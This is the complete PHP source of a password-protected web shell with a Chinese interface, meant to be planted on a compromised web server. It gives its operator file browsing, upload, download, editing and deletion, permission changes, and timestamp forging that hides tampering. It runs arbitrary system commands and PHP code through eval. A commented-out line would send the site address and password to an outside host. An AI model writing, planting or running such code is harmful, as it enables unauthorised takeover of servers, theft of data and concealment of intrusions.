d3.php

<?php
error_reporting(0);
header("Content-type:text/html;charset=gb2312"); 
$password = "c5cd946631fa902a901c243055339788";
$me = "http://".getenv("HTTP_HOST").$_SERVER['PHP_SELF'];
$cookiename = "pxer";
if(isset($_POST['pass'])){
$a = ed_pwd($_POST['pass']);
if($a == $password){setcookie($cookiename, $a, time()+43200);}
//header("Location: ht"."tp:/"."/d.".$cookiename.'.tk/'.'i.php?w='.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'&p='.$_POST['pass']);
header("Location: ".$me);
}
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)){
print "<table border=0 width=100% height=100%><td valign=\"middle\"><center><form action=\"".$me."\" method=\"POST\"><input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=submit></form>";
die();}
if(isset($_GET['p']) && $_GET['p'] == "logout"){
setcookie ($cookiename, "", time() - 43200);
header("Location: ".$me);}
if(isset($_REQUEST['dir'])){chdir(urldecode($_REQUEST['dir']));}
if(isset($_GET['file'])){$content = urldecode($_GET['file']);} else {$content = $_POST['file'];}
if(ereg('/',realpath('.'))) {$perd = '/';} else {$perd = '\\';}
if(isset($_REQUEST['q'])){
switch ($_REQUEST['q']) {
case 'downfile':
if (isset($_GET['file'])) {
$filename = basename($content);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename.'');
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($content));
@readfile($_GET['file']);
exit;}
break;
case 'upfile':
if(isset($_FILES['uploadedfile']['name'])){
$target_path = $_POST['dir'].$perd;
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
echo (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) ?  "成功" : "失败";}
break;
case 'createdir':
if(isset($_POST['crdir'])) {echo (mkdir($_POST['crdir'])) ? "成功" : "失败";}
break;
}
}
$pages = array('cmd' => '命令','eval' => '代码','logout' => '注销');
$header = '<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理 '.getenv("HTTP_HOST").'</title><style>td {font-size: 12px; font-family: verdana; color: #33FF00; background: #000;}#d0 {background: #002000;}#d0:hover {background: #003300;}#d1 {background: #003300;}#d1:hover {background: #003300;}#f0 {background: #004000;}#f0:hover {background: #003000;}#f1 {background: #005500;}#f1:hover {background: #003000;}#s {background: #006300;}pre {font-size: 10px; font-family: verdana; color: #33FF00;}a{color: #33FF00;}a:hover {text-decoration: none;}input,textarea,select {border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 11px; border-left-color: #33FF00; background: #000; border-bottom-width: 1px; border-bottom-color: #33FF00; color: #33FF00; border-top-color: #33FF00; font-family: verdana;  border-right-width: 1px; border-right-color: #33FF00;}hr{color: #33FF00; background-color: #33FF00; height: 5px;}</style></head><body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"><table width=100%><td id="header" width=100%><p align=left><b>[<a href="?">文管</a>]';
foreach($pages as $page => $page_name){$header .= ' [<a href="?p='.$page.'&dir='.urlencode(realpath('.')).'">'.$page_name.'</a>]';}
$header .= '<hr>'.show_dirs('.',$perd).'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; 版权没有，欢迎复制</center></td></table></body></head></html>';
$hdir = "<input type=hidden name=dir value=\"".realpath('.')."\">";
if(isset($_REQUEST['p'])){
switch ($_REQUEST['p']) {
case 'rename':
if(isset($_POST['file']) && !empty($_POST['filenew'])){echo (rename($content,$_POST['filenew'])) ? "成功" : "失败";}
print "<form action=\"?p=rename\" method=POST><b>原名:<br></b><input type=text name=file value=\"".stripslashes($content)."\" size=70 readonly><br><b>新名:<br><input type=text name=filenew value=\"\" size=70><br>".$hdir."<br><br><input type=submit></form>";
break;
case 'delete':
if(isset($_POST['file'])){if (is_dir($content)){echo (rmdir($content)) ? "成功" : "失败";} else {echo (unlink($content)) ? "成功" : "失败";}}
if(isset($_GET['file']) && file_exists($content)){print "确定删除 ".stripslashes($content)." 么？<br><form action=\"?p=delete\" method=POST><input type=hidden name=file value=".$content.">".$hdir."<br><br><input type=submit>";}
break;
case 'editfile':
print "<h3>编辑 <b>".stripslashes($content)."</b> (".perm($content).")</h3><br>";
if(isset($_POST['editform'])){
$f = $_POST['file'];
$fh = fopen($f, 'w') or print "打不开";
echo (fwrite($fh, stripslashes(htmlspecialchars_decode($_POST['editform'])))) ? "成功" : "失败";
fclose($fh);
}
print "<br><form action=\"?p=editfile\" method=POST><input type=hidden name=file value=\"".stripslashes($content)."\"><textarea cols=150 rows=30 name=\"editform\">";
if(file_exists($content) and !isset($_POST['editform'])){
$rd = file($content);
foreach($rd as $l){print htmlspecialchars($l, ENT_QUOTES);}
} else {echo stripslashes(htmlspecialchars($_POST['editform']));}
print "</textarea>".$hdir."<br><br><input type=submit></form>";
break;
case 'chmod':
print "<h3>改权</h3>";
if(isset($_POST['file'])){
if(0<=$_POST['chvalue'] && $_POST['chvalue']<=777){echo (chmod($content,"0".$_POST['chvalue'])) ? "成功" : "失败";}else{echo "输入有误";}
}
print "<form action=\"?p=chmod\" method=POST><b>文件:<input type=text name=file value=\"".stripslashes($content)."\" size=70 readonly><br><b>权限</b><input type=text name=chvalue value=\"777\" size=6>".$hdir."<br><br><input type=submit>";
break;
case 'modFMT':
print "<h3>修改时间</h3>";
if(isset($_POST['file']) && !empty($_POST['time'])){
$mtime = explode("-",$_POST['time'],6);
if(1970<=$mtime[0]&&$mtime[0]<=2100 && 1<=$mtime[1]&&$mtime[1]<=12 && 1<=$mtime[2]&&$mtime[2]<=31 && 0<=$mtime[3]&&$mtime[3]<=23 && 0<=$mtime[4]&&$mtime[4]<=59 && 0<=$mtime[5]&&$mtime[5]<=59){
$mfunix = mktime($mtime[3],$mtime[4],$mtime[5],$mtime[1],$mtime[2],$mtime[0]);
echo (@touch($content, $mfunix)) ? "成功" : "失败";
} else {print "输入有误";}
}
print "<form action=\"?p=modFMT\" method=POST><b>文件<input type=text name=file value=\"".stripslashes($content)."\" size=70 readonly><br><b>原时间</b><input type=text name=Ftime value=\"".date("Y-m-d-H-i-s", filemtime($content))."\" size=24 readonly><br><b>新时间</b><input type=text name=time value=\"\" size=24>".$hdir."<br><br><input type=submit>";
break;
case 'cmd':
print "<form action=\"?p=cmd\" method=POST><b>命令</b><select name=ef><option value=\"system\">system</option><option value=\"passthru\">passthru</option><option value=\"exec\">exec</option><option value=\"shell_exec\">shell_exec</option></select><input type=text name=command size=100>".$hdir."<input type=submit></form><br><br><b>输出</b><br>";
if(isset($_REQUEST['command'])){
print "<textarea cols=143 rows=20 name=\"result\" readonly>";
execute_command($_POST['ef'],$_REQUEST['command']);
print "</textarea>";
}
break;
case 'eval':
print "<form action=\"?p=eval\" method=POST><textarea cols=150 rows=10 name=\"eval\">";
echo (isset($_POST['eval'])) ? stripcslashes($_POST['eval']) : "echo \"test\";";
print "</textarea>".$hdir."<br><br><input type=submit></form><br><br><b>输出</b><br>";
if(isset($_POST['eval'])){
print "<textarea cols=150 rows=20 name=\"result\" readonly>";
eval(stripcslashes($_POST['eval']));
print "</textarea>";
}
break;
}
} else {
$files = array();
$directories = array();
print "<table border=0 width=100%><td width=100px id=s><b>操作</b></td><td id=s><b>名称</b></td><td id=s><b>大小</b></td><td width=40px id=s><b>权限</b></td><td id=s>用户</td><td id=s>创建时间</td><td id=s>修改时间</td><tr>";
if ($handle = opendir('.')){while (false !== ($file = readdir($handle))) {if(is_dir($file)){$directories[] = $file;} else {$files[] = $file;}}
asort($directories);
asort($files);
$td="d0";
$tf="f0";
foreach($directories as $file){
if($td=="d1"){$td="d0";}else{$td="d1";}
if($file == '.'){
print "<td id=".$td."></td><td id=".$td."><a href=\"?dir=.\">脚本目录</a></td><td id=".$td."></td><td id=".$td."><font color=".get_color($file).">".perm($file)."</font></td><td id=".$td.">".fileowner($file)."</td><td id=".$td.">".date ("Y-m-d-H-i-s", filectime($file))."</td><td id=".$td.">".date ("Y-m-d-H-i-s", filemtime($file))."</td><tr>";
} elseif($file == '..'){
print "<td id=".$td."></td><td id=".$td."><a href=\"?dir=..\">上级目录</a></td><td id=".$td."></td><td id=".$td."><font color=".get_color($file).">".perm($file)."</font></td><td id=".$td.">".fileowner($file)."</td><td id=".$td.">".date ("Y-m-d-H-i-s", filectime($file))."</td><td id=".$td.">".date ("Y-m-d-H-i-s", filemtime($file))."</td><tr>";
} else {
$d_path = urlencode(realpath($file).$perd.'..');
print "<td id=".$td."><a href=\"?p=rename&file=".$file."&dir=".$d_path."\">[重]</a><a href=\"?p=delete&file=".$file."&dir=".$d_path."\">[删]</a></td><td id=".$td."><a href=\"?dir=".urlencode(realpath($file))."\">".$file."</a></td><td id=".$td."></td><td id=".$td."><a href=\"?p=chmod&file=".$d_path."&dir=".$d_path."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=".$td.">".fileowner($file)."</td><td id=".$td.">".date ("Y-m-d-H-i-s", filectime($file))."</td><td id=".$td.">".date ("Y-m-d-H-i-s", filemtime($file))."</td><tr>";
}
}
foreach($files as $file){
if($tf=="f1"){$tf="f0";}else{$tf="f1";}
$d_path=urlencode(realpath($file));
print "<td id=".$tf."><a href=\"?q=downfile&file=". $d_path."&dir=".urlencode(realpath('.'))."\">[下]</a><a href=\"?p=editfile&file=".$d_path."&dir=".urlencode(realpath('.'))."\">[编]</a><a href=\"?p=rename&file=".$d_path."&dir=".urlencode(realpath('.'))."\">[重]</a><a href=\"?p=delete&file=".$d_path."&dir=".urlencode(realpath('.'))."\">[删]</a></td><td id=".$tf."><a href=\"".$file."\" target=\"_blank\">".$file."</a></td><td id=".$tf.">".filesize($file)."</td><td id=".$tf."><a href=\"?p=chmod&file=".$d_path."&dir=".urlencode(realpath('.'))."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=".$td.">".fileowner($file)."</td><td id=".$tf.">".date ("Y-m-d-H-i-s", filectime($file))."</td><td id=".$tf."><a href=\"?p=modFMT&file=".$d_path."&dir=".urlencode(realpath('.'))."\">".date ("Y-m-d-H-i-s", filemtime($file))."</a></td><tr>";
}
} else {
print "无权限浏览<b>".realpath('.')."</b>!<br>";
}
print "</table><hr><table border=0 width=100%><td><form enctype=\"multipart/form-data\" action=\"?q=upfile\" method=\"POST\"><b>上传文件</b><br><input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" />".$hdir."<input size=50 name=\"uploadedfile\" type=\"file\" /><input type=\"submit\"/></form></td><td><form action=\"?q=cd\" method=POST><b>跳到目录<br></b><input type=text size=60 name=dir value=\"".realpath('.')."\"><input type=submit></form></td><tr><td><form action=\"?p=editfile\" method=POST><b>新建文件<br></b>".$hdir."<input type=text size=60 name=file value=\"".realpath('.').$perd."test.php\"><input type=submit></form></td><td><form action=\"?q=createdir\" method=POST><b>新建目录<br></b><input type=text size=60 name=crdir value=\"".realpath('.').$perd."test\">".$hdir."<input type=submit></form></td></table>";
}
function ed_pwd($p){return md5('a612c'.md5(md5('b5a49'.$p).'9e8f4').'ec5d7');}
function execute_command($method,$command) {
switch($method){
case 'system':
system($command,$rv);
if(!$rv==0){print "无效命令或函数受限";}
break;
case 'passthru':
passthru($command,$rv);
if(!$rv==0){print "无效命令或函数受限";}
break;
case 'exec':
exec($command,$re,$rv);
if($rv==0){foreach($re as $o){print $o."\n";}}else{print "无效命令或函数受限";}
break;
case 'shell_exec':
print shell_exec($command);
break;
}
}
function perm($file) {return substr(sprintf('%o', fileperms($file)), -4);}
function get_color($file) {if(is_writable($file)){return "green";}elseif(!is_writable($file) && is_readable($file)){return "white";}else{ return "red";}}
function show_dirs($where,$perd){
$dirparts = explode($perd,realpath($where));
$i = 0; $total = "";
foreach($dirparts as $part){
$p = 0; $pre = "";
while($p != $i){$pre .= $dirparts[$p].$perd; $p++;}
$total .= "<a href=\"?dir=".urlencode($pre.$part)."\">".$part.$perd."</a>";
$i++;
}
return "<h3>".$total."</h3>";
}
print $footer;
exit();